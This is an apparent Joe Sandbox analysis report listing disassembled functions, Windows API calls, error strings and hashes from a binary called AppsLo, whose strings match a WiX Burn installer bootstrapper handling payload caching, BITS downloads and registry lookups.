Opcode Fuzzy Hash: 4f449a7e445f7170ca2b51f6e2e62f03991f02021475397332962537a7848d54
Instruction Fuzzy Hash: 5A417572900629EFDB209BA5DC85BDFBFB8FF09760F104125F915EA350D770A9448BA1

Function 008CC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to recreate command-line arguments., xrefs: 008CCA43
Failed to copy download source for passthrough pseudo bundle., xrefs: 008CC98F
Failed to allocate memory for pseudo bundle payload hash., xrefs: 008CC9AD
Failed to copy related arguments for passthrough bundle package, xrefs: 008CCA82
Failed to copy filename for passthrough pseudo bundle., xrefs: 008CC9BE
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 008CC7B4
Failed to copy key for passthrough pseudo bundle payload., xrefs: 008CC9C5
pseudobundle.cpp, xrefs: 008CC7A8, 008CC9A1, 008CC9DB
Failed to copy key for passthrough pseudo bundle., xrefs: 008CC988
Failed to copy local source path for passthrough pseudo bundle., xrefs: 008CC9B7
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 008CC9E7
Failed to copy install arguments for passthrough bundle package, xrefs: 008CCA62
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 008CCAAC
Failed to copy cache id for passthrough pseudo bundle., xrefs: 008CCA05

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: 2334015924851ff6d7f928e41c080cd0181f25f46c701bc43e2b6ba3600d3eaf
Instruction ID: dfb809e7df77949e5e3a56833b207ada3e1ee366d91c6b5adea07c1d1721bd8e
Opcode Fuzzy Hash: 2334015924851ff6d7f928e41c080cd0181f25f46c701bc43e2b6ba3600d3eaf
Instruction Fuzzy Hash: C5B13675A0061AAFDB21DF68C881F56BBB1FF48714F118169EA18EB352CB31E851DB90

Function 008CDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 008CDE61

Strings

Failed to set callback interface for BITS job., xrefs: 008CDF99
Failed to download BITS job., xrefs: 008CDFF8
Failed to copy download URL., xrefs: 008CDEA8
Failed to complete BITS job., xrefs: 008CE00B
Failed while waiting for BITS download., xrefs: 008CE012
Invalid BITS user URL: %ls, xrefs: 008CDE83
Failed to initialize BITS job callback., xrefs: 008CDF82
Failed to create BITS job., xrefs: 008CDEF0
Failed to create BITS job callback., xrefs: 008CDF74
Failed to set credentials for BITS job., xrefs: 008CDF0F
bitsuser.cpp, xrefs: 008CDE77, 008CDF6A
Failed to add file to BITS job., xrefs: 008CDF2E
Falied to start BITS job., xrefs: 008CE019

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS user URL: %ls$bitsuser.cpp
API String ID: 1659193697-2382896028
Opcode ID: 198b77e56aa14c7738aaa38cdbf220be8715f0a01219734a523af5195afdf6c4
Instruction ID: c91ff6e9ce37ed3fff3c280f70a4b373270d52a4e1865516d540e345cea243c1
Opcode Fuzzy Hash: 198b77e56aa14c7738aaa38cdbf220be8715f0a01219734a523af5195afdf6c4
Instruction Fuzzy Hash: D4619031A00625EFCB11AB98C885F6E7BB4FF48724B11415AFD05EB251DBB1DD009B91

Function 008ABC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008ABCE5
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 008ABDF2
GetLastError.KERNEL32(?,?,?,?), ref: 008ABDFC
WaitForInputIdle.USER32(?,?), ref: 008ABE50
CloseHandle.KERNEL32(?,?,?), ref: 008ABE9B
CloseHandle.KERNEL32(?,?,?), ref: 008ABEA8

Strings

Failed to format argument string., xrefs: 008ABCF0
D, xrefs: 008ABDD1
Failed to format obfuscated argument string., xrefs: 008ABD3C
approvedexe.cpp, xrefs: 008ABE20
Failed to CreateProcess on path: %ls, xrefs: 008ABE2D
"%ls", xrefs: 008ABD62, 008ABD7C
Failed to create obfuscated executable command., xrefs: 008ABD90
"%ls" %s, xrefs: 008ABD0B, 008ABD4C
Failed to create executable command., xrefs: 008ABD1F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: 4dea4d09548020962e2f0c0e541cc1e0bcc1960ae03163b712de282b43833b81
Instruction ID: 66c4245d61e1cb986fb3b2f31743ab2d83addec2855cbeaacfa8110f0ad608f5
Opcode Fuzzy Hash: 4dea4d09548020962e2f0c0e541cc1e0bcc1960ae03163b712de282b43833b81
Instruction Fuzzy Hash: 78518A72C0065ABBEF229FD5CC429EEBB78FF06310B004165FA10F6622D7359E209B91

Function 008C69D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,008C6F28,?), ref: 008C6A0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,008C6F28,?,?,?), ref: 008C6A18
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,008C6F28,?,?,?), ref: 008C6A60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,008C6F28,?,?,?), ref: 008C6A6C
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,008C6F28,?,?,?), ref: 008C6AA6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,008C6F28,?,?,?), ref: 008C6AB0
CloseServiceHandle.ADVAPI32(00000000), ref: 008C6B67
CloseServiceHandle.ADVAPI32(?), ref: 008C6B71

Strings

msuuser.cpp, xrefs: 008C6A3C, 008C6A90, 008C6AD4
Failed to open WU service., xrefs: 008C6A9A
Failed to open service control manager., xrefs: 008C6A46
Failed to read configuration for WU service., xrefs: 008C6B17
Failed to mark WU service to start on demand., xrefs: 008C6B38
Failed to query status of WU service., xrefs: 008C6ADE
wuauserv, xrefs: 008C6A5A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuuser.cpp$wuauserv
API String ID: 971853308-301359130
Opcode ID: a17399c2450da50128d724a2cfb8a08771acd45c42c8bcf41bdd6055420fe4a0
Instruction ID: 4a9c58031c5b3e8c9efc6f8dd13c7ccd2df775d67e017149d6fde3b35e0c027b
Opcode Fuzzy Hash: a17399c2450da50128d724a2cfb8a08771acd45c42c8bcf41bdd6055420fe4a0
Instruction Fuzzy Hash: 2B418472A447396BD7219AA88C85FAFB7B5FF04720B158439FE11FB241E674DC108AA0

Function 008B3B4E Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 008B3BA2
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 008B3BAC
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 008B3C15
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 008B3C1C
CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 008B3CA6

Strings

Failed to copy temp folder., xrefs: 008B3CCF
logging.cpp, xrefs: 008B3BD0
Failed to format session id as a string., xrefs: 008B3C4A
Failed to get temp folder., xrefs: 008B3BDA
%u\, xrefs: 008B3C36
4#v, xrefs: 008B3BA2
Failed to get length of temp folder., xrefs: 008B3C06
crypt32.dll, xrefs: 008B3B61
Failed to get length of session id string., xrefs: 008B3C71

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
String ID: 4#v$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 2407829081-4287186919
Opcode ID: 25129977fde3fe6d59fa23bb0e28e7da1683ee76593d1eccd2dfacfd4eea9f73
Instruction ID: 438ece7f0f80a47cd77221b1e5305400cd5c3dbdfcbb5bf2e5cbd72edf0b00cc
Opcode Fuzzy Hash: 25129977fde3fe6d59fa23bb0e28e7da1683ee76593d1eccd2dfacfd4eea9f73
Instruction Fuzzy Hash: 24418472D8523DABDB319B648C49AEA7B78FB10720F110191FA18F7351DA749F448BD1

Function 008AA28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008AA2B3
_MREFOpen@16.MSPDB140-MSVCRT ref: 008AA30E
RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 008AA32F
RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 008AA405

Strings

Failed to format key string., xrefs: 008AA2BE
search.cpp, xrefs: 008AA360
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008AA37A
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 008AA3DD
Failed to query registry key value., xrefs: 008AA36A
Failed to open registry key. Key = '%ls', xrefs: 008AA3C7
Failed to format value string., xrefs: 008AA319
Registry key not found. Key = '%ls', xrefs: 008AA396
Failed to set variable., xrefs: 008AA3BD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: bd76a251e59277aa5683d20396638cc9c4a897fc1258dd9adff339a8da76a502
Instruction ID: 12593d0b4342888410723225f6caf72a9f1950bae4b4163db8de6bd1acec807c
Opcode Fuzzy Hash: bd76a251e59277aa5683d20396638cc9c4a897fc1258dd9adff339a8da76a502
Instruction Fuzzy Hash: 89410932D00169BBEF265B99CC06FAFBA64FB06710F104160FD14F6A52D7769E10DB92

Function 008AB208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,008ABAFB,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB210
GetLastError.KERNEL32(?,008ABAFB,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB21C

Strings

.wix, xrefs: 008AB2E3
Failed to get module handle to process., xrefs: 008AB24A
Bundle guid didn't match the guid in the PE Header in memory., xrefs: 008AB39B
Failed to find valid DOS image header in buffer., xrefs: 008AB27D
Failed to read section info, unsupported version: %08x, xrefs: 008AB35E
section.cpp, xrefs: 008AB240, 008AB271, 008AB29C, 008AB305, 008AB326, 008AB34F, 008AB38F
Failed to read section info, data to short: %u, xrefs: 008AB314
burn, xrefs: 008AB2EB
Failed to find valid NT image header in buffer., xrefs: 008AB2A8
Failed to find Burn section., xrefs: 008AB332
.wixburn, xrefs: 008AB2BE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 4242514867-926796631
Opcode ID: 4ce52e3c485afeef55c7755151059fefe9863fddf50f9421e6cc4cd49049e44d
Instruction ID: 15a7afe2350cdf9e63bc09bebab086b5398b867d304a7b2daad9962709ed1422
Opcode Fuzzy Hash: 4ce52e3c485afeef55c7755151059fefe9863fddf50f9421e6cc4cd49049e44d
Instruction Fuzzy Hash: 9C412A32280651A7EB2155968C46F5A2691FF83B31B25403AF921EFB83D7ADC84182E6

Function 008A694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 008A699B
GetLastError.KERNEL32 ref: 008A69A5
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 008A69E8
GetLastError.KERNEL32 ref: 008A69F2
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 008A6B03

Strings

Failed to locate RtlGetVersion., xrefs: 008A6A20
ntdll, xrefs: 008A6995
variable.cpp, xrefs: 008A69C9, 008A6A16
Failed to set variant value., xrefs: 008A6AE7
Failed to locate NTDLL., xrefs: 008A69D3
Failed to get OS info., xrefs: 008A6A43
RtlGetVersion, xrefs: 008A69DD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: 11241cdc0820512c0c68acfc1b669eea6672d176fbcc71b1a31e40cc5b3218ad
Instruction ID: 734fdb06cf25a6d1f907fcb52d41a7ac604665486e21574f380d528545cbadca
Opcode Fuzzy Hash: 11241cdc0820512c0c68acfc1b669eea6672d176fbcc71b1a31e40cc5b3218ad
Instruction Fuzzy Hash: 2D41E532D002399BEB319B658C45BEE7AB4FB0A710F044199ED18F6281F7789E90CB91

Function 008A48EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,008A5466,?,?,?,?), ref: 008A4920
GetLastError.KERNEL32(?,?,?,008A5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A4931
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A4A6E
CloseHandle.KERNEL32(?,?,?,?,008A5466,?,?,?,?,?,?,?,?,?,?,?), ref: 008A4A77

Strings

user.cpp, xrefs: 008A4955, 008A499E
Failed to create the message window., xrefs: 008A49CC
Failed to allocate thread local storage for logging., xrefs: 008A495F
Failed to connect to unelevated process., xrefs: 008A4916
Failed to set elevated pipe into thread local storage for logging., xrefs: 008A49A8
comres.dll, xrefs: 008A49DD
Failed to pump messages from parent process., xrefs: 008A4A42

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$user.cpp
API String ID: 687263955-1790235126
Opcode ID: 7c2ae37de3486a47b4b508d9440f560090b504f2f87594f81e04ba5f78b849ac
Instruction ID: 30e27dafa947d38fbf316581c92ec224552b5fd5c950a64b0ffc52e3e9d8e54d
Opcode Fuzzy Hash: 7c2ae37de3486a47b4b508d9440f560090b504f2f87594f81e04ba5f78b849ac
Instruction Fuzzy Hash: C841F873940666BBDB119BA5CC45EDFBB6CFF46710F000226BA14E6611DBB4B91087D1

Function 008A7FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 008A7FC2
LeaveCriticalSection.KERNEL32(?), ref: 008A81EA

Strings

Failed to write variable value as string., xrefs: 008A81AE
Failed to write included flag., xrefs: 008A81D8
Unsupported variable type., xrefs: 008A81A7
Failed to write literal flag., xrefs: 008A81C3
Failed to get version., xrefs: 008A819B
Failed to write variable value type., xrefs: 008A81CA
Failed to write variable value as number., xrefs: 008A8194
feclient.dll, xrefs: 008A809D, 008A80F3, 008A8134
Failed to get numeric., xrefs: 008A81BC
Failed to get string., xrefs: 008A81B5
Failed to write variable count., xrefs: 008A7FDD
Failed to write variable name., xrefs: 008A81D1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: 11296a999274239f0d5f60f3d233fa1aef15ad5d53bb2815d8cbc20231ababa2
Instruction ID: d1aa2b348b0ce4863839441b54984ac4cfcbacd2aff5f2755a7bf31e40cf6d83
Opcode Fuzzy Hash: 11296a999274239f0d5f60f3d233fa1aef15ad5d53bb2815d8cbc20231ababa2
Instruction Fuzzy Hash: 6B71D332D0061AEFEB129F68CC40BAE7BA4FF06354F104526FA10E7A50DB34DD169BA1

Function 008B97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,008BA843,00000000,00000000,00000000,?,00000000), ref: 008B97CD
GetLastError.KERNEL32(?,008BA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008B97DD

Part of subcall function 008E4102: Sleep.KERNEL32(?,00000000,?,008B85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,008A4DBC), ref: 008E4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008B98E9

Strings

Failed to verify payload signature: %ls, xrefs: 008B9838
Moving, xrefs: 008B987F
%ls payload from working path '%ls' to path '%ls', xrefs: 008B9894
Failed to move %ls to %ls, xrefs: 008B98C1
Failed to verify payload hash: %ls, xrefs: 008B9875
Failed to copy %ls to %ls, xrefs: 008B98D7
cache.cpp, xrefs: 008B9801
Failed to open payload in working path: %ls, xrefs: 008B980C
Copying, xrefs: 008B9888, 008B9893

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 1275171361-1604654059
Opcode ID: a9135031d791053ad980bb5c818fb9cef76c8bd409d965583a79b33c39c1ea7e
Instruction ID: f1743fbdd809db9b52c59467a7bbda6f022ce4ba095646caece8f177b64f8c9d
Opcode Fuzzy Hash: a9135031d791053ad980bb5c818fb9cef76c8bd409d965583a79b33c39c1ea7e
Instruction Fuzzy Hash: 8931F872940679BBDA321A698C4AFAB2A5CFF42B60F010135FF54FB391D6649C0096E2

Function 008A65C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 008A65FC

Part of subcall function 008E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,008A5EB2,00000000), ref: 008E0AE0
Part of subcall function 008E0ACC: GetProcAddress.KERNEL32(00000000), ref: 008E0AE7
Part of subcall function 008E0ACC: GetLastError.KERNEL32(?,?,?,008A5EB2,00000000), ref: 008E0AFE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008A6628
GetLastError.KERNEL32 ref: 008A6636
GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 008A666E
GetLastError.KERNEL32 ref: 008A6678
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008A66BB
GetLastError.KERNEL32 ref: 008A66C5

Strings

Failed to get 64-bit system folder., xrefs: 008A6664
variable.cpp, xrefs: 008A665A, 008A669C
Failed to set system folder variant value., xrefs: 008A6724
Failed to get 32-bit system folder., xrefs: 008A66A6
Failed to backslash terminate system folder., xrefs: 008A6708

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 325818893-1590374846
Opcode ID: 112327d9d6c05664760f599c59a14391f54a79876f32d06d38f25194b11601d5
Instruction ID: 24636a506f1d87f8160b9ea302d8ec40b55ae340e11a35567022d7b1d0900f11
Opcode Fuzzy Hash: 112327d9d6c05664760f599c59a14391f54a79876f32d06d38f25194b11601d5
Instruction Fuzzy Hash: 58315672D41239A7EB309B658C49B9B37A8FF12760F090265BD14FB680F778DD408AE1

Function 008B3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008B3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,008B3FB5,feclient.dll,?,00000000,?,?,?,008A4B12), ref: 008B3B42

